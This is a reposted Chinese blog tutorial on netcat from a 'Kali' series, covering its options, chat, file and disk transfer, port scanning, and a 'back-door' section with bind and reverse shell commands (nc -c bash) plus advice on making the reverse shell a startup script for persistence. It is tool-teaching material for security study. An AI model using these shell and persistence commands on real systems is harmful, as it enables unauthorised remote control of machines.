🔥 热搜 🔥
百度今日热点微信公众平台贴吧opggdnf私服百度贴吧知乎dnf公益服百度傻逼
分类
社会娱乐国际人权科技经济其它
🔥 热搜 🔥
百度今日热点微信公众平台贴吧opggdnf私服百度贴吧知乎dnf公益服百度傻逼
分类
社会娱乐国际人权科技经济其它
查看原文
其他

Kali系列--网络军刀NC!

漫流砂 2021-04-25

The following article is from 漫流沙 Author 意大利的猫

   关注漫流沙有干货噢!

Kali

X

Linux




Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.


the quieter you become,the more you can hear

            NetCat在网络安全届的知名度也是十分的高,是大家普遍认可的 "瑞士军刀"。它是一个跨平台的工具,功能十分强大!

下面就让我来给大家介绍一下!

 0

参数解析

-v 显示详细连接输出内容(和大多数工具一样)

-n 不做Dns解析(因为让nc去解析域名非常慢,所以一般都直接写ip)

-l 启动监听(listen)

-p 指定端口(port)

-q num  完成后num秒断开连接

-c 反弹一个shell(可以作为后门)


 1

聊天

主机A(10.10.45.172) :nc -lp 8888

主机B(10.10.45.168) :nc -nv 10.10.45.172 8888 

此时就可以建立一个连接,进行畅快地聊天啦!


 2 

传递目录内容



 3 

获取文件内容


 4 

传递文件

演示传输文件

A: nc -lp 8888 > 接收视频.mp4

B: nc -nv 10.10.45.172 8888 < 发送视频.mp4 -q 1

或者反过来

 5 

加密文件传输

以上我们说的各种功能都是在不加密的情况下做的,可以被嗅探到明文,所以我们可以配合其他软件实现加密功能

首先安装mcrypt : apt-get install mcrypt

A: nc -lp 4444 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 10.10.45.172 4444 -q 1



 6 

流媒体服务

A: cat 1.mp4 | nc -lp 8888

B: nc -nv 10.10.45.172 8888 | mplayer -vo x11 -cache 3000 -

不过一般我们也用不到这种传输,毕竟网速不见得跟得上


 7

端口扫描

    这是一个主动的端口扫描(目标IP: 10.10.45.172)

    TCP :

        nc -nvz 10.10.45.172 1-65535

    UDP :

        nc -vnzu 10.10.45.172 1-65535

   

    可以看出目标开放了22端口


 8

远程克隆硬盘


   在计算机取证中,原则上是不允许直接操作被入侵的硬盘的,        防止证据不完整。在韩剧《幽灵》中就有相关的情节,一般都        使用专业的设备将硬盘完整的复制过来,这种复制是把扇区信    息都复制过来,所以相当于一个同样的硬盘!

    A: nc -lp 8888 | dd of=/dev/sda

    B: dd if=/dev/sda | nc -nv 10.10.45.172 8888 -q 1  


 9

远程控制(back-door)

    我相信这个才是最吸引大家的!  

    正向:

    A: nc -lp 8888 -c bash 

    B: nc -nv 10.10.45.172 8888 

    之后就可以在B端执行bash命令了,而执行结果会在A端产生


    反向:

    A: nc -lp 8888

    B: nc -nv 10.10.45.168 8888 -c bash

    这样A端就可以执行B端的shell了。

    

    其实反向更适合web渗透中的权限维持,因为在服务器一般会放置在IDC机房,防火墙一般会禁止服务器开放陌生端口,也会阻止外界对于服务器陌生端口连接。

    而反向的思路是在我们的主机上开放端口,之后把连接我们服务器做成一个启动运行脚本,之后他就会主动连接我们了


####

注意: 在windows中把bash改成cmd

####

 10

模拟Web浏览器




 11

NC变体



    一直被模仿,从未被超越!

    NC也有大量的变体  

    NC在数据传输时用的是明文传输,并且端口一直开着就会导致别人也可以进行链接

    ncat解决了这个问题

    ncat是nmap组件包中的组件

    A : ncat -c bash --allow 10.10.45.168 -vnl 8888 --ssl  

    这条语句的意思是只允许10.10.45.168这个IP来进行连接,开放并监听8888端口,使用ssl加密

    B: ncat -nv 10.10.45.172 8888 --ssl

    


    这篇文章详细的介绍了NetCat工具的使用,我也耗费了两个多小时,如果对你有帮助,记得转载给其他人哦!

    

                        赞赏可以扫描下方的二维码哦!



    您可能也对以下帖子感兴趣

    文章有问题?点此查看未经处理的缓存